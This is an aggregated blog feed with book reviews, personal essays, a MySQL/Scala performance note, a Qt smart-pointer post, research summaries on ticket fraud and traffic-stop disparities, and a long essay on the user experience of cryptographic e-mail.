Newport's guidance is constructed around the premise (which seems to have some grounding in psychological research) that focused, concentrated work is less a habit that one needs to maintain than a muscle that one needs to develop. His contention is that multitasking and interrupt-driven work isn't just a distraction that can be independently indulged or avoided each day, but instead degrades one's ability to concentrate over time. People who regularly jump between tasks lose the ability to not jump between tasks. If they want to shift to more focused work, they have to regain that ability with regular, mindful practice. So, when Newport says to embrace boredom, it's not just due to the value of quiet and unstructured moments. He argues that reaching for one's phone to scroll through social media in each moment of threatened boredom undermines one's ability to focus in other areas of life.

I'm not sure I'm as convinced as Newport is, but I've been watching my own behavior closely since I read this book and I think there's some truth here. I picked this book up because I've been feeling vaguely dissatisfied with my ability to apply concentrated attention to larger projects, and because I have a tendency to return to a comfort zone of unchallenging tasks that I already know how to do. Newport would connect that to a job with an open plan office, a very interrupt-driven communications culture, and my personal habits, outside of work hours, of multitasking between TV, on-line chat, and some project I'm working on.

I'm not particularly happy about that diagnosis. I don't like being bored, I greatly appreciate the ability to pull out my phone and occupy my mind while I'm waiting in line, and I have several very enjoyable hobbies that only take "half a brain," which I neither want to devote time to exclusively nor want to stop doing entirely. But it's hard to argue with the feeling that my brain skitters away from concentrating on one thing for extended periods of time, and it does feel like an underexercised muscle.

Some of Newport's approach seems clearly correct: block out time in your schedule for uninterrupted work, find places to work that minimize distractions, and batch things like email and work chat instead of letting yourself be constantly interrupted by them. I've already noticed how dramatically more productive I am when working from home than working in an open plan office, even though the office doesn't bother me in the moment. The problems with an open plan office are real, and the benefits seem largely imaginary. (Newport dismantles the myth of open office creativity and contrasts it with famously creative workplaces like MIT and Bell Labs that used a hub and spoke model, where people would encounter each other to exchange ideas and then retreat into quiet and isolated spaces to do actual work.) And Newport's critique of social media seemed on point to me: it's not that it offers no benefits, but it is carefully designed to attract time and attention entirely out of proportion to the benefits that it offers, because that's the business model of social media companies.

Like any time management book, some of his other advice is less convincing. He makes a strong enough argument for blocking out every hour of your day (and then revising the schedule repeatedly through the day as needed) that I want to try it again, but I've attempted that in the past and it didn't go well at all. I'm similarly dubious of my ability to think through a problem while walking, since most of the problems I work on rely on the ability to do research, take notes, or start writing code while I work through the problem. But Newport presents all of this as examples drawn from his personal habits, and cares less about presenting a system than about convincing the reader that it's both valuable and possible to carve out thinking space for oneself and improve one's capacity for sustained concentration.

This book is explicitly focused on people with office jobs who are rewarded for tackling somewhat open-ended problems and finding creative solutions. It may not resonate with people in other lines of work, particularly people whose jobs are the interrupts (customer service jobs, for example). But its target profile fits me and a lot of others in the tech industry. If you're in that group, I think you'll find this thought-provoking.

Recommended, particularly if you're feeling harried, have the itch to do something deeper or more interesting, and feel like you're being constantly pulled away by minutia.

You can get a sample of Newport's writing in his Study Habits blog, although be warned that some of the current moral panic about excessive smartphone and social media use creeps into his writing there. (He's currently working on a book on digital minimalism, so if you're allergic to people who have caught the minimalism bug, his blog will be more irritating than this book.) I appreciated him keeping the moral panic out of this book and instead focusing on more concrete and measurable benefits.

Rating: 8 out of 10

Sky CroeserMothering

Today I am thinking about mothering as a way in which we can make the world (in all its messiness and difficulty) better.

“Children are the ways that the world begins again and again. If you fasten upon that concept of their promise, you will have trouble finding anything more awesome, and also anything more extraordinarily exhilarating, than the opportunity or/and the obligation to nurture a child into his or her own freedom.” – June Jordan

Mothering is often treated by our society as an inherently conservative activity, something that’s about preserving the past (past traditions, past family structures, past values). But I’m learning from so many people (including people who aren’t biological mothers) who are knitting together strands from the past and hopes for the future.

Care for nature, for the world around us, for our mothers’ and grandmothers’ knowledge and experience. And dreams of more space for children to be who they want to be, to welcome and nurture others, to grow freely.

My mother and grandmother taught me so much, and still do. They are kind and fierce and have managed change and dislocation while always providing me with a steady point in the world.

My beautiful friends who are mothers teach me every day through their examples and their honesty about the difficult moments as well as the wonderful ones.

And I learn from mothers beyond my little circles, too.

From Noongar mothers, and other Aboriginal mothers who fought for recognition of the kidnapping of their children, and who are working today to build a society where their children will be safe and valued as they should be.

From Black mothers like June Jordan, Alexis Pauline Gumbs, and others in the ‘Revolutionary Mothering’ collection, which I return to again and again. They have done so much to help me understand other mothers’ experiences, and to see the possibilities and work that I should be taking up. And others, like Sylvia Federici, who have helped me see what I might not have, otherwise.

From mothers who must be brave enough to leave war or economic insecurity, hoping for safety, even though it also means leaving behind family and friends and home and the language and culture that has been held dear.

From mothers who work quietly and consistently and without recognition, from mothers who are sometimes difficult because of the work they do, from mothers who struggle with their own pasts, and who nevertheless keep trying to create the world anew, more full of love and possibility than before.

,

Planet Linux AustraliaMichael Still: Head On

Share

A sequel to Lock In, this book is a quick and fun read of a murder mystery. It has Scalzi’s distinctive style which has generally meshed quite well for me, so it’s not surprise that I enjoyed this book.

 

Head On Book Cover Head On
John Scalzi
Fiction
Tor Books
April 19, 2018
336

To some left with nothing, winning becomes everything In a post-virus world, a daring sport is taking the US by storm. It's frenetic, violent and involves teams attacking one another with swords and hammers. The aim: to obtain your opponent's head and carry it through the goalposts. Impossible? Not if the players have Hayden's Syndrome. Unable to move, Hayden's sufferers use robot bodies, which they operate mentally. So in this sport anything goes, no one gets hurt - and crowds and competitors love it. Until a star athlete drops dead on the playing field. But is it an accident? FBI agents Chris Shane and Leslie Vann are determined to find out. In this game, fortunes can be made - or lost. And both players and owners will do whatever it takes to win, on and off the field.John Scalzi returns with Head On, a chilling near-future SF with the thrills of a gritty cop procedural. Head On brings Scalzi's trademark snappy dialogue and technological speculation to the future world of sports.

Share

The post Head On appeared first on Made by Mikal.

Don MartiCan markets for intent data even be a thing?

Doc Searls is optimistic that surveillance marketing is going away, but what's going to replace it? One idea that keeps coming up is the suggestion that prospective buyers should be able to sell purchase intent data to vendors directly. This seems to be appealing because it means that the Marketing department will still get to have Big Data and stuff, but I'm still trying to figure out how voluntary transactions in intent data could even be a thing.

Here's an example. It's the week before Thanksgiving, and I'm shopping for a kitchen stove. Here are two possible pieces of intent information that I could sell.

  • "I'm cutting through the store on the way to buy something else. If a stove is on sale, I might buy it, but only if it's a bargain, because who needs the hassle of handling a stove delivery the week before Thanksgiving?"

  • "My old stove is shot, and I need one right away because I have already invited people over. Shut up and take my money."

On a future intent trading platform, what's my incentive to reveal which intent is the true one?

If I'm a bargain hunter, I'm willing to sell my intent information, because it would tend to get me a lower price. But in that case, why would any store want to buy the information?

If I need the product now, I would only sell the information for a price higher than the expected difference between the price I would pay and the price a bargain hunter would pay. But if the information isn't worth more than the price difference, why would the store want to buy it?

So how can a market for purchase intent data happen?

Or is the idea of selling access to purchase intent only feasible if the intent data is taken from the "data subject" without permission?

Anyway, I can see how search advertising and signal-based advertising can assume a more important role as surveillance marketing becomes less important, but I'm not sure about markets for purchase intent. Maybe user data sharing will be not so much a stand-alone thing but a role for trustworthy news and cultural sites, as people choose to share data as part of commenting and survey completion, and that data, in aggregated form, becomes part of a site's audience profile.

Planet DebianRuss Allbery: Review: Always Human

Review: Always Human, by walkingnorth

Publisher: LINE WEBTOON
Copyright: 2015-2017
Format: Online graphic novel
Pages: 336
Always Human is a graphic novel published on the LINE WEBTOON platform. It was originally published in weekly updates and is now complete in two "seasons." It is readable for free, starting with episode one. The pages metadata in the sidebar is therefore a bit of a lie: it's my guess on how many pages this would be if it were published as a traditional graphic novel (four times the number of episodes), provided as a rough guide of how long it might take to read (and because I have a bunch of annual reading metadata that I base on page count, even if I have to make up the concept of pages).

Always Human is set in a 24th century world in which body modifications for medical, cosmetic, and entertainment purposes are ubiquitous. What this story refers to as "mods" are nanobots that encompass everything from hair and skin color changes through protection from radiation to allow interplanetary travel to anti-cancer treatments. Most of them can be trivially applied with no discomfort, and they've largely taken over the fashion industry (and just about everything else). The people of this world spend as little time thinking about their underlying mechanics as we spend thinking about synthetic fabrics.

This is why Sunati is so struck by the young woman she sees at the train station. Sunati first noticed her four months ago, and she's not changed anything about herself since: not her hair, her eye color, her skin color, or any of the other things Sunati (and nearly everyone else) change regularly. To Sunati, it's a striking image of self-confidence and increases her desire to find an excuse to say hello. When the mystery woman sneezes one day, she sees her opportunity: offer her a hay-fever mod that she carries with her!

Alas for Sunati's initial approach, Austen isn't simply brave or quirky. She has Egan's Syndrome, an auto-immune problem that makes it impossible to use mods. Sunati wasn't expecting her kind offer to be met with frustrated tears. In typical Sunati form, she spends a bunch of time trying to understand what happened, overthinking it, hoping to see Austen again, and freezing when she does. Lucky for Sunati, typical Austen form is to approach her directly and apologize, leading to an explanatory conversation and a trial date.

Always Human is Sunati and Austen's story: their gentle and occasionally bumbling romance, Sunati's indecisiveness and tendency to talk herself out of communicating, and Austen's determined, relentless, and occasionally sharp-edged insistence on defining herself. It's not the sort of story that has wars, murder mysteries, or grand conspiracies; the external plot drivers are more mundane concerns like choice of majors, meeting your girlfriend's parents, and complicated job offers. It's also, delightfully, not the sort of story that creates dramatic tension by occasionally turning the characters into blithering idiots.

Sunati and Austen are by no means perfect. Both of them do hurt each other without intending to, both of them have blind spots, and both of them occasionally struggle with making emergencies out of things that don't need to be emergencies. But once those problems surface, they deal with them with love and care and some surprisingly good advice. My first reading was nervous. I wasn't sure I could trust walkingnorth not to do something stupid to the relationship for drama; that's so common in fiction. I can reassure you that this is a place where you can trust the author.

This is also a story about disability, and there I don't have the background to provide the same reassurance with much confidence. However, at least from my perspective, Always Human reliably treats Austen as a person first, weaves her disability into her choices and beliefs without making it the cause of everything in her life, and tackles head-on some of the complexities of social perception of disabilities and the bad tendency to turn people into Inspirational Disabled Role Model. It felt to me like it struck a good balance.

This is also a society that's far more open about human diversity in romantic relationships, although there I think it says more about where we currently are as a society than what the 24th century will "actually" be like. The lesbian relationship at the heart of the story goes essentially unremarked; we're now at a place where that can happen without making it a plot element, at least for authors and audiences below a certain age range. The (absolutely wonderful) asexual and non-binary characters in the supporting cast, and the one polyamorous relationship, are treated with thoughtful care, but still have to be remarked on by the characters.

I think this says less about walkingnorth as a writer than it does about managing the expectations of the reader. Those ideas are still unfamiliar enough that, unless the author is very skilled, they have to choose between dragging the viciousness of current politics into the story (which would be massively out of place here) or approaching the topic with an earnestness that feels a bit like an after-school special. walkingnorth does the latter and errs on the side of being a little too didactic, but does it with a gentle sense of openness that fits the quiet and supportive mood of the whole story. It feels like a necessary phase that we have to go through between no representation at all and the possibility of unremarked representation, which we're approaching for gay and lesbian relationships.

You can tell from this review that I mostly care about the story rather than the art (and am not much of an art reviewer), but this is a graphic novel, so I'll try to say a few things about it. The art seemed clearly anime- or manga-inspired to me: large eyes as the default, use of manga conventions for some facial expressions, and occasional nods towards a chibi style for particularly emotional scenes. The color palette has a lot of soft pastels that fit the emotionally gentle and careful mood. The focus is on human figures and shows a lot of subtlety of facial expressions, but you won't get as much in the way of awe-inspiring 24th century backgrounds. For the story that walkingnorth is telling, the art worked extremely well for me.

The author also composed music for each episode. I'm not reviewing it because, to be honest, I didn't enable it. Reading, even graphic novels, isn't that sort of multimedia experience for me. If, however, you like that sort of thing, I have been told by several other people that it's quite good and fits the mood of the story.

That brings up another caution: technology. A nice thing about books, and to a lesser extent traditionally-published graphic novels, is that whether you can read it doesn't depend on your technological choices. This is a web publishing platform, and while apparently it's a good one that offers some nice benefits for the author (and the author is paid for their work directly), it relies on a bunch of JavaScript magic (as one might expect from the soundtrack). I had to fiddle with uMatrix to get it to work and still occasionally saw confusing delays in the background loading some of the images that make up an episode. People with more persnickety ad and JavaScript blockers have reported having trouble getting it to display at all. And, of course, one has to hope that the company won't lose interest or go out of business, causing Always Human to disappear. I'd love to buy a graphic novel on regular paper at some point in the future, although given the importance of the soundtrack to the author (and possible contracts with the web publishing company), I don't know if that will be possible.

This is a quiet, slow, and reassuring story full of gentle and honest people who are trying to be nice to each other while navigating all the tiny conflicts that still arise in life. It wasn't something I was looking for or even knew I would enjoy, and turned out to be exactly what I wanted to read when I found it. I devoured it over the course of a couple of days, and am now eagerly awaiting the author's next work (Aerial Magic). It is unapologetically cute and adorable, but that covers a solid backbone of real relationship insight. Highly recommended; it's one of the best things I've read this year.

Many thanks to James Nicoll for writing a review of this and drawing it to my attention.

Rating: 9 out of 10

Planet DebianNorbert Preining: MySql DataTime/TimeStamp fields and Scala

In one of my work projects we use Play Framework on Scala to provide an API (how surprising ;-). For quite some time I was hunting after lots of milliseconds, time the API answer was just terrible late compared to hammering directly at the MySql server. It turned out to be a problem of interaction between MySql DateTime format and Scala.

It sounded like to nice an idea to save our traffic data in a MySql database with the timestamp saved in a DateTime or Timestamp column. Display in the Mysql Workbench looks nice and easily readable. But somehow our API server’s response was horribly slow, especially when there were several requests. Hours and hours of tuning of SQL code, trying to turning of sorting, adding extra indices, nothing of all that to any avail.

The solution was rather trivial, the actual time lost is not in the SQL part, nor in the processing in our Scala code, but in the conversion from MySql DateTime/Timestamp object to Scala/Java Timestamp. We are using ActiveRecord for Scala, a very nice and convenient library, which converts MySql DateTime/Timestamps to Scala/Java Timestamps. But this conversion seems, especially for a large number of entries, to become rather slow. With months of traffic data and hundreds of thousands of timestamps to convert, the API collapsed to unacceptable response times.

Converting the whole pipeline (from data producer to database and api) to use plain simple Long boosted the API performance considerably. Lesson learned, don’t use MySql DateTime/Timestamp if you need lots of conversions.

,

CryptogramFriday Squid Blogging: How the Squid Lost Its Shell

Squids used to have shells.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Sociological ImagesWho Gets a Ticket?

The recent controversial arrests at a Philadelphia Starbucks, where a manager called the police on two Black men who had only been in the store a few minutes, are an important reminder that bias in the American criminal justice system creates both large scale, dramatic disparities and little, everyday inequalities. Research shows that common misdemeanors are a big part of this, because fines and fees can pile up on people who are more likely to be policed for small infractions.

A great example is the common traffic ticket. Some drivers who get pulled over get a ticket, while others get let off with a warning. Does that discretion shake out differently depending on the driver’s race? The Stanford Open Policing Project has collected data on over 60 million traffic stops, and a working paper from the project finds that Black and Hispanic drivers are more likely to be ticketed or searched at a stop than white drivers.

To see some of these patterns in a quick exercise, we pulled the project’s data on over four million stop records from Illinois and over eight million records from South Carolina. These charts are only a first look—we split the recorded outcomes of stops across the different codes for driver race available in the data and didn’t control for additional factors. However, they give a troubling basic picture about who gets a ticket and who drives away with a warning.

(Click to Enlarge)
(Click to Enlarge)

These charts show more dramatic disparities in South Carolina, but a larger proportion of white drivers who were stopped got off with warnings (and fewer got tickets) in Illinois as well. In fact, with millions of observations in each data set, differences of even a few percentage points can represent hundreds, even thousands of drivers. Think about how much revenue those tickets bring in, and who has to pay them. In the criminal justice system, the little things can add up quickly.

(View original at https://thesocietypages.org/socimages)

Planet DebianSune Vuorela: Modern C++ and Qt – part 2.

I recently did a short tongue-in-cheek blog post about Qt and modern C++. In the comments, people discovered that several compilers effectively can optimize std::make_unique<>().release() to a simple new statement, which was kind of a surprise to me.

I have recently written a new program from scratch (more about that later), and I tried to force myself to use standard library smartpointers much more than what I normally have been doing.

I ended up trying to apply a set of rules for memory handling to my code base to try to see where it could end.

  • No naked delete‘s
  • No new statements, unless it was handed directly to a Qt function taking ownership of the pointer. (To avoid sillyness like the previous one)
  • Raw pointers in the code are observer pointers. We can do this in new code, but in older code it is hard to argue that.

It resulted in code like

m_document = std::make_unique<QTextDocument>();
    auto layout = std::make_unique<QHBoxLayout>();
    auto textView = std::make_unique<QTextBrowser>();
    textView->setReadOnly(true);
    textView->setDocument(m_document.get());
    layout->addWidget(textView.release());
    setLayout(layout.release());

By it self, it is quite ok to work with, and we get all ownership transfers documented. So maybe we should start code this way.

But there is also a hole in the ownership pass around, but given Qt methods doesn’t throw, it shouldn’t be much of a problem.

More about my new fancy / boring application at a later point.

I still haven’t fully embraced the c++17 thingies. My mental baseline is kind of the compiler in Debian Stable.

CryptogramAirline Ticket Fraud

New research: "Leaving on a jet plane: the trade in fraudulently obtained airline tickets:"

Abstract: Every day, hundreds of people fly on airline tickets that have been obtained fraudulently. This crime script analysis provides an overview of the trade in these tickets, drawing on interviews with industry and law enforcement, and an analysis of an online blackmarket. Tickets are purchased by complicit travellers or resellers from the online blackmarket. Victim travellers obtain tickets from fake travel agencies or malicious insiders. Compromised credit cards used to be the main method to purchase tickets illegitimately. However, as fraud detection systems improved, offenders displaced to other methods, including compromised loyalty point accounts, phishing, and compromised business accounts. In addition to complicit and victim travellers, fraudulently obtained tickets are used for transporting mules, and for trafficking and smuggling. This research details current prevention approaches, and identifies additional interventions, aimed at the act, the actor, and the marketplace.

Blog post.

Planet DebianDaniel Kahn Gillmor: E-mail Cryptography

I've been working on cryptographic e-mail software for many years now, and i want to set down some of my observations of what i think some of the challenges are. I'm involved in Autocrypt, which is making great strides in sensible key management (see the last section below, which is short not because i think it's easy, but because i think Autocrypt has covered this area quite well), but there are additional nuances to the mechanics and user experience of e-mail encryption that i need to get off my chest.

Feedback welcome!

Cryptography and E-mail Messages

Cryptographic protection (i.e., digital signatures, encryption) of e-mail messages has a complex history. There are several different ways that various parts of an e-mail message can be protected (or not), and those mechanisms can be combined in a huge number of ways.

In contrast to the technical complexity, users of e-mail tend to expect a fairly straightforward experience. They also have little to no expectation of explicit cryptographic protections for their messages, whether for authenticity, for confidentiality, or for integrity.

If we want to change this -- if we want users to be able to rely on cryptographic protections for some e-mail messages in their existing e-mail accounts -- we need to be able to explain those protections without getting in the user's way.

Why expose cryptographic protections to the user at all?

For a new messaging service, the service itself can simply enumerate the set of properties that all messages exchanged through the service must have, design the system to bundle those properties with message deliverability, and then users don't need to see any of the details for any given message. The presence of the message in that messaging service is enough to communicate its security properties to the extent that the users care about those properties.

However, e-mail is a widely deployed, heterogenous, legacy system, and even the most sophisticated users will always interact with some messages that lack cryptographic protections.

So if we think those protections are meaningful, and we want users to be able to respond to a protected message at all differently from how they respond to an unprotected message (or if they want to know whether the message they're sending will be protected, so they can decide how much to reveal in it), we're faced with the challenge of explaining those protections to users at some level.

Simplicity

The best level to display cryptographic protects for a typical e-mail user is on a per-message basis.

Wider than per-message (e.g., describing protections on a per-correspondent or a per-thread basis) is likely to stumble on mixed statuses, particularly when other users switch e-mail clients that don't provide the same cryptographic protections, or when people are added to or removed from a thread.

Narrower than per-message (e.g., describing protections on a per-MIME-part basis, or even within a MIME part) is too confusing: most users do not understand the structure of an e-mail message at a technical level, and are unlikely to be able to (or want to) spend any time learning about it. And a message with some cryptographic protection and other tamperable user-facing parts is a tempting vector for attack.

So at most, an e-mail should have one cryptographic state that covers the entire message.

At most, the user probably wants to know:

  • Is the content of this message known only to me and the sender (and the other people in Cc)? (Confidentiality)

  • Did this message come from the person I think it came from, as they wrote it? (Integrity and Authenticity)

Any more detail than this is potentially confusing or distracting.

Combinations

Is it possible to combine the two aspects described above into something even simpler? That would be nice, because it would allow us to categorize a message as either "protected" or "not protected". But there are four possible combinations:

  • unsigned cleartext messages: these are clearly "not protected"

  • signed encrypted messages: these are clearly "protected" (though see further sections below for more troubling caveats)

  • signed cleartext messages: these are useful in cases where confidentiality is irrelevant -- posts to a publicly-archived mailing list, for example, or announcement e-mails about a new version of some piece of software. It's hard to see how we can get away with ignoring this category.

  • unsigned encrypted messages: There are people who send encrypted messages who don't want to sign those messages, for a number of reasons (e.g., concern over the reuse/misuse of their signing key, and wanting to be able to send anonymous messages). Whether you think those reasons are valid or not, some signed messages cannot be validated. For example:

    • the signature was made improperly,
    • the signature was made with an unknown key,
    • the signature was made using an algorithm the message recipient doesn't know how to interpret
    • the signature was made with a key that the recipient believes is broken/bad

    We have to handle receipt of signed+encrypted messages with any of these signature failures, so we should probably deal with unsigned encrypted messages in the same way.

My conclusion is that we need to be able to represent these states separately to the user (or at least to the MUA, so it can plan sensible actions), even though i would prefer a simpler representation.

Note that some other message encryption schemes (such as those based on shared symmetric keying material, where message signatures are not used for authenticity) may not actually need these distinctions, and can therefore get away with the simpler "protected/not protected" message state. I am unaware of any such scheme being used for e-mail today.

Partial protections

Sadly, the current encrypted e-mail mechanisms are likely to make even these proposed two indicators blurry if we try to represent them in detail. To avoid adding to user confusion, we need to draw some bright lines.

  • For integrity and authenticity, either the entire message is signed and integrity-checked, or it isn't. We must not report messages as being signed when only a part of the message is signed, or when the signature comes from someone not in the From: field. We should probably also not present "broken signature" status any differently that we present unsigned mail. See discussion on the enigmail mailing list about some of these tradeoffs.

  • For confidentiality, the user likely cares that the entire message was confidential. But there are some circumstances (e.g., when replying to an e-mail, and deciding whether to encrypt or not) when they likely care if any part of the message was confidential (e.g. if an encrypted part is placed next to a cleartext part).

It's interesting (and frustrating!) to note that these are scoped slightly differently -- that we might care about partial confidentiality but not about partial integrity and authenticity.

Note that while we might care about partial confidentiality, actually representing which parts of a message were confidential represents a signficant UI challenge in most MUAs.

To the extent that a MUA decides it wants to display details of a partially-protected message, i recommend that MUA strip/remove all non-protected parts of the message, and just show the user the (remaining) protected parts. In the event that a message has partial protections like this, the MUA may need to offer the user a choice of seeing the entire partially-protected message, or the stripped down message that has complete protections.

To the extent that we expect to see partially-protected messages in the real world, further UI/UX exploration would be welcome. It would be great to imagine a world where those messages simply don't exist though :)

Cryptographic Mechanism

There are three major categories of cryptographic protection for e-mail in use today: Inline PGP, PGP/MIME, and S/MIME.

Inline PGP

I've argued elsewhere (and it remains true) that Inline PGP signatures are terrible. Inline PGP encryption is also terrible, but in different ways:

  • it doesn't protect the structure of the message (e.g., the number and size of attachments is visible)

  • it has no way of protecting confidential message headers (see the Protected Headers section below)

  • it is very difficult to safely represent to the user what has been encrypted and what has not, particularly if the message body extends beyond the encrypted block.

No MUA should ever emit messages using inline PGP, either for signatures or for encryption. And no MUA should ever display an inline-PGP-signed block as though it was signed. Don't even bother to validate such a signature.

However, some e-mails will arrive using inline PGP encryption, and responsible MUAs probably need to figure out what to show to the user in that case, because the user wants to know what's there. :/

PGP/MIME and S/MIME

PGP/MIME and S/MIME are roughly equivalent to one another, with the largest difference being their certificate format. PGP/MIME messages are signed/encrypted with certificates that follow the OpenPGP specification, while S/MIME messages rely on certificates that follow the X.509 specification.

The cryptographic protections of both PGP/MIME and S/MIME work at the MIME layer, providing particular forms of cryptographic protection around a subtree of other MIME parts.

Both standards have very similar existing flaws that must be remedied or worked around in order to have sensible user experience for encrypted mail.

This document has no preference of one message format over the other, but acknowledges that it's likely that both will continue to exist for quite some time. To the extent possible, a sensible MUA that wants to provide the largest coverage will be able to support both message formats and both certificate formats, hopefully with the same fixes to the underlying problems.

Cryptographic Envelope

Given that the plausible standards (PGP/MIME and S/MIME) both work at the MIME layer, it's worth thinking about the MIME structure of a cryptographically-protected e-mail messages. I introduce here two terms related to an e-mail message: the "Cryptographic Envelope" and the "Cryptographic Payload".

Consider the MIME structure of a simple cleartext PGP/MIME signed message:

0A └┬╴multipart/signed
0B  ├─╴text/plain
0C  └─╴application/pgp-signature

Consider also the simplest PGP/MIME encrypted message:

1A └┬╴multipart/encrypted
1B  ├─╴application/pgp-encrypted
1C  └─╴application/octet-stream
1D     ╤ <<decryption>>
1E     └─╴text/plain

Or, an S/MIME encrypted message:

2A └─╴application/pkcs7-mime; smime-type=enveloped-data
2B     ╤ <<decryption>>
2C     └─╴text/plain

Note that the PGP/MIME decryption step (denoted "1D" above) may also include a cryptographic signature that can be verified, as a part of that decryption. This is not the case with S/MIME, where the signing layer is always separated from the encryption layer.

Also note that any of these layers of protection may be nested, like so:

3A └┬╴multipart/encrypted
3B  ├─╴application/pgp-encrypted
3C  └─╴application/octet-stream
3D     ╤ <<decryption>>
3E     └┬╴multipart/signed
3F      ├─╴text/plain
3G      └─╴application/pgp-signature

For an e-mail message that has some set of these layers, we define the "Cryptographic Envelope" as the layers of cryptographic protection that start at the root of the message and extend until the first non-cryptographic MIME part is encountered.

Cryptographic Payload

We can call the first non-cryptographic MIME part we encounter (via depth-first search) the "Cryptographic Payload". In the examples above, the Cryptographic Payload parts are labeled 0B, 1E, 2C, and 3F. Note that the Cryptographic Payload itself could be a multipart MIME object, like 4E below:

4A └┬╴multipart/encrypted
4B  ├─╴application/pgp-encrypted
4C  └─╴application/octet-stream
4D     ╤ <<decryption>>
4E     └┬╴multipart/alternative
4F      ├─╴text/plain
4G      └─╴text/html

In this case, the full subtree rooted at 4E is the "Cryptographic Payload".

The cryptographic properties of the message should be derived from the layers in the Cryptographic Envelope, and nothing else, in particular:

  • the cryptographic signature associated with the message, and
  • whether the message is "fully" encrypted or not.

Note that if some subpart of the message is protected, but the cryptographic protections don't start at the root of the MIME structure, there is no message-wide cryptographic envelope, and therefore there either is no Cryptographic Payload, or (equivalently) the whole message (5A here) is the Cryptographic Payload, but with a null Cryptographic Envelope:

5A └┬╴multipart/mixed
5B  ├┬╴multipart/signed
5C  │├─╴text/plain
5D  │└─╴application/pgp-signature
5E  └─╴text/plain

Note also that if there are any nested encrypted parts, they do not count toward the Cryptographic Envelope, but may mean that the message is "partially encrypted", albeit with a null Cryptographic Envelope:

6A └┬╴multipart/mixed
6B  ├┬╴multipart/encrypted
6C  │├─╴application/pgp-encrypted
6D  │└─╴application/octet-stream
6E  │   ╤ <<decryption>>
6F  │   └─╴text/plain
6G  └─╴text/plain

Layering within the Envelope

The order and number of the layers in the Cryptographic Envelope might make a difference in how the message's cryptographic properties should be considered.

signed+encrypted vs encrypted+signed

One difference is whether the signature is made over the encrypted data, or whether the encryption is done over the signature. Encryption around a signature means that the signature was hidden from an adversary. And a signature around the encryption indicates that sender may not know the actual contents of what was signed.

The common expectation is that the signature will be inside the encryption. This means that the signer likely had access to the cleartext, and it is likely that the existence of the signature is hidden from an adversary, both of which are sensible properties to want.

Multiple layers of signatures or encryption

Some specifications define triple-layering: signatures around encryption around signatures. It's not clear that this is in wide use, or how any particular MUA should present such a message to the user.

In the event that there are multiple layers of protection of a given kind in the Cryptographic Envelope, the message should be marked based on the properties of the inner-most layer of encryption, and the inner-most layer of signing. The main reason for this is simplicity -- it is unclear how to indicate arbitrary (and potentially-interleaved) layers of signatures and encryption.

(FIXME: what should be done if the inner-most layer of signing can't be validated for some reason, but one of the outer layers of signing does validate? ugh MIME is too complex…)

Signed messages should indicate the intended recipient

Ideally, all signed messages would indicate their intended recipient as a way of defending against some forms of replay attack. For example, Alice signs a signed message to Bob that says "please perform task X"; Bob reformats and forwards the message to Charlie as though it was directly from Alice. Charlie might now believes that Alice is asking him to do task X, instead of Bob.

Of course, this concern also includes encrypted messages that are also signed. However, there is no clear standard for how to include this information in either an encrypted message or a signed message.

An e-mail specific mechanism is to ensure that the To: and Cc: headers are signed appropriately (see the "Protected Headers") below.

See also Vincent Breitmoser's proposal of Intended Recipient Fingerprint for OpenPGP as a possible OpenPGP-specific implementation.

However: what should the MUA do if a message is encrypted but no intended recipients are listed? Or what if a signature clearly indicates the intended recipients, but does not include the current reader? Should the MUA render the message differently somehow?

Protected Headers

Sadly, e-mail cryptographic protections have traditionally only covered the body of the e-mail, and not the headers. Most users do not (and should not have to) understand the difference. There are two not-quite-standards for protecting the headers:

  • message wrapping, which puts an entire e-mail message (message/rfc822 MIME part) "inside" the cryptographic protections. This is also discussed in RFC 5751 §3.1. I don't know of any MUAs that implement this.

  • memory hole, which puts headers on the top-level MIME part directly. This is implemented in Enigmail and K-9 mail.

These two different mechanisms are roughly equivalent, with slight differences in how they behave for clients who can handle cryptographic mail but have not implemented them. If a MUA is capable of interpreting one form successfully, it probably is also capable of interpreting the other.

Note that in particular, the cryptographic headers for a given message ought to be derived directly from the headers present (in one of the above two ways) in the root element of the Cryptographic Payload MIME subtree itself. If headers are stored anywhere else (e.g. in one of the leaf nodes of a complex Payload), they should not propagate to the outside of the message.

If the headers the user sees are not protected, that lack of protection may need to be clearly explained and visible to the user. This is unfortunate because it is potentially extremely complex for the UI.

The types of cryptographic protections can differ per header. For example, it's relatively straightforward to pack all of the headers inside the Cryptographic Payload. For a signed message, this would mean that all headers are signed. This is the recommended approach when generating an encrypted message. In this case, the "outside" headers simply match the protected headers. And in the case that the outsider headers differ, they can simply be replaced with their protected versions when displayed to the user. This defeats the replay attack described above.

But for an encrypted message, some of those protected headers will be stripped from the outside of the message, and others will be placed in the outer header in cleartext for the sake of deliverability. In particular, From: and To: and Date: are placed in the clear on the outside of the message.

So, consider a MUA that receives an encrypted, signed message, with all headers present in the Cryptographic Payload (so all headers are signed), but From: and To: and Date: in the clear on the outside. Assume that the external Subject: reads simply "Encrypted Message", but the internal (protected) Subject: is actually "Thursday's Meeting".

When displaying this message, how should the MUA distinguish between the Subject: and the From: and To: and Date: headers? All headers are signed, but only Subject: has been hidden. Should the MUA assume that the user understands that e-mail metadata like this leaks to the MTA? This is unfortuately true today, but not something we want in the long term.

Message-ID and threading headers

Messages that are part of an e-mail thread should ensure that Message-Id: and References: and In-Reply-To: are signed, because those markers provide contextual considerations for the signed content. (e.g., a signed message saying "I like this plan!" means something different depending on which plan is under discussion).

That said, given the state of the e-mail system, it's not clear what a MUA should do if it receives a cryptographically-signed e-mail message where these threading headers are not signed. That is the default today, and we do not want to incur warning fatigue for the user. Furthermore, unlike Date: and Subject: and From: and To: and Cc:, the threading headers are not usually shown directly to the user, but instead affect the location and display of messages.

Perhaps there is room here for some indicator at the thread level, that all messages in a given thread are contextually well-bound? Ugh, more UI complexity.

Protecting Headers during e-mail generation

When generating a cryptographically-protected e-mail (either signed or encrypted or both), the sending MUA should copy all of the headers it knows about into the Cryptographic Payload using one of the two techniques referenced above. For signed-only messages, that is all that needs doing.

The challenging question is for encrypted messages: what headers on the outside of the message (outside the Cryptographic Envelope) can be to be stripped (removed completely) or stubbed (replaced with a generic or randomized value)?

Subject: should obviously be stubbed -- for most users, the subject is directly associated with the body of the message (it is not thought of as metadata), and the Subject is not needed for deliverability. Since some MTAs might treat a message without a Subject: poorly, and arbitrary Subject lines are a nuisance, it is recommended to use the exact string below for all external Subjects:

Subject: Encrypted Message

However, stripping or stubbing other headers is more complex.

